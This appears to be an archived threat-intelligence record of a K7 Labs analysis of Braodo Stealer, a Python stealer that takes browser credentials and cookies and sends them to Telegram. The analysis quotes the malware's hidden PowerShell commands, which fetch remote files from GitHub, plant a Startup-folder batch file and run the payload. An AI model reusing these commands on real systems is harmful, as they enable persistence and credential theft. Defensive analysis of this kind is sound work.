{
	"id": "2e5d45b2-1c8a-4625-a615-6cd07d9ad3bc",
	"created_at": "2026-04-06T00:19:51.974943Z",
	"updated_at": "2026-04-10T03:21:55.148587Z",
	"deleted_at": null,
	"sha1_hash": "612e273379ff1bc2dace486600492a76ea7aa29a",
	"title": "Echoes of Braodo Tales from the Cyber Underworld",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 349877,
	"plain_text": "Echoes of Braodo Tales from the Cyber Underworld\r\nPublished: 2024-07-22 · Archived: 2026-04-05 20:44:14 UTC\r\nIn the last few months we’ve been observing a lot of tweets talking about the rise in Vietnam-based malware aka Braodo Stealer. This blog gets into the nuances of Braodo, an information stealer capable of stealthily infiltrating a victim’s system to harvest sensitive information such as credentials and banking information, enabling damage such as identity theft and financial loss. In this blog, we have analyzed one of the stealer’s samples, whose hash was taken from a recent tweet.\r\nThis stealer was first seen in the real world as shown in Fig.1.\r\nFig.1: First seen in real world (Source: MalwareBazaar)\r\nBraodo Stealer is a Python-based stealer which collects cookies and saved credentials from browsers, along with service and process information of the infected system, and packages them as a zip file. Let us now get into the technicalities.\r\nThe execution flow is as shown in Fig.2.\r\nFig.2: Flow of its execution\r\nInitially it arrives as a zip file. On extraction, it contains a batch file “health-records-x-ray-n.bat” which starts with the bytes “FF FE”, a UTF-16 LE byte order mark (BOM), so that the batch file’s contents appear as unreadable characters when opened in Notepad++, as shown in Fig.3.\r\nAfter removing “FF FE” and opening it in Notepad++, it looks as in Figure.4.\r\nhttps://labs.k7computing.com/index.php/echoes-of-braodo-tales-from-the-cyber-underworld/\r\nPage 1 of 8\n\nFig.3: Batch file in Notepad++ with “FF FE”\r\nFig.4: Batch file after removing “FF FE”\r\nOn executing the bat file, it starts a PowerShell process which downloads a batch file from a GitHub URL with the following command and saves it as “WindowsSecure.bat” in the Startup folder for persistence.\r\nC:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -windowstyle hidden Invoke-WebRequest -URI https://github.com/ohlisit/123/raw/main/update.bat -OutFile “C:\\\\Users\\\\$([Environment]::UserName)\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\’Start Menu’\\\\Programs\\\\Startup\\\\WindowsSecure.bat”;\r\nFig.5: Connection of PowerShell to GitHub\r\nFig.6: Writing WindowsSecure.bat in the Startup folder\r\nIt also downloads a zip file called “Document.zip” to the path “C:\\Users\\Public” from a GitHub URL, as shown in the below command.\r\npowershell.exe -WindowStyle Hidden -Command “[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile(‘https://github.com/ohlisit/123/raw/main/Document.zip’, ‘C:\\Users\\Public\\Document.zip’)”;\r\nFig.7: Downloaded contents of Document.zip in “C:\\Users\\Public”\r\nIf we manually browse that GitHub repository, we can see that their bat files and zip files are being periodically updated, as can be seen in the figure below.\r\nFig.8: GitHub Repository\r\nThe Document.zip is uncompressed using the following command:\r\ncmd /c powershell.exe -WindowStyle Hidden -Command Expand-Archive -Path “C:\\Users\\Public\\Document.zip” -DestinationPath “C:/Users/Public/Document”;\r\nThe Document.zip file contains all the libraries required by python.exe, as shown in Fig.8. Inside, we found a Python file named “sim.py”, which is the actual payload written in Python, as shown in Figure.9; it contains junk data along with the actual payload code, as shown in Figure.10.\r\nFig.9: Payload as sim.py\r\nFig.10: Sim.py having stealer code\r\nAfter unzipping the archive to “C:\\Users\\Public\\Document”, it starts python.exe with the below command; the subsequent steps are discussed in detail now.\r\npowershell.exe -WindowStyle Hidden -Command “C:\\Users\\Public\\Document\\python C:\\Users\\Public\\Document\\Lib\\sim.py”\r\nFig.11: Creating python.exe process by PowerShell\r\nAfter creating python.exe, it loads all the required libs and DLLs from the Document folder and starts executing the code present in sim.py step by step.\r\nIt starts by retrieving the computer name, current logged-in user name, Windows version, system time and the system’s IP address (by requesting “https://ipinfo.io”).\r\nFig.12: Retrieving computer IP, current user name\r\nIn the main function, we can find Telegram Bot API URL strings in the u1 and u2 variables, which are used to send the stolen information.\r\nFig.13: Telegram API bots\r\nThen it takes the user data path of every browser present in the system and checks whether each browser’s path exists. If it exists, it starts stealing all user data, cookies, web data, login data and local state from every browser present in the system and places them in separate folders named after the browser.\r\nFig.14: Checking paths and creating folders for every Browser\r\nThen it decrypts the sensitive data (login data, cookies, web data) of every browser by connecting to the “Login Data” and “Cookies” SQLite databases and decrypting their contents with AES, using the master key obtained from the Local State file.\r\nFig.15: Decrypting login data and cookies from its database using AES\r\nAfter collecting and writing all data from the different locations to text files, it packs the files into a zip file for sending to the Telegram channel.\r\nFig.16: Collected data\r\nFig.17: Snippet of converting into zip file\r\nAfter packing all the files into the zip archive, it sends that zip file to the Telegram channel as shown in Figure.18 and Figure.19. It then removes “Document.zip” from its location.\r\nFig.18: POST request for sending zip file\r\nFig.19: Removing “Document.zip”\r\nAs we can see, threat actors are updating their malware to become more and more evasive. Compared to other stealers, this one is mainly focused on network-related information which could be used for active reconnaissance. As the information stolen by the malware is sensitive, protecting yourself by investing in a reputable security product such as K7 Antivirus is therefore necessary in today’s world. We at K7 Labs provide detection for such kinds of stealers and all the latest threats. Users are advised to use a reliable security product such as “K7 Total Security” and keep it up-to-date to safeguard their devices.\r\nIOC\r\nFile Name | Hash | Detection Name\r\nhealth-records-x-ray-n | 4BA8BDD684441EF9F6F9AC7DE7EDB28B | Trojan ( 0001140e1 )\r\nSource: https://labs.k7computing.com/index.php/echoes-of-braodo-tales-from-the-cyber-underworld/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://labs.k7computing.com/index.php/echoes-of-braodo-tales-from-the-cyber-underworld/"
	],
	"report_names": [
		"echoes-of-braodo-tales-from-the-cyber-underworld"
	],
	"threat_actors": [],
	"ts_created_at": 1775434791,
	"ts_updated_at": 1775791315,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/612e273379ff1bc2dace486600492a76ea7aa29a.pdf",
		"text": "https://archive.orkl.eu/612e273379ff1bc2dace486600492a76ea7aa29a.txt",
		"img": "https://archive.orkl.eu/612e273379ff1bc2dace486600492a76ea7aa29a.jpg"
	}
}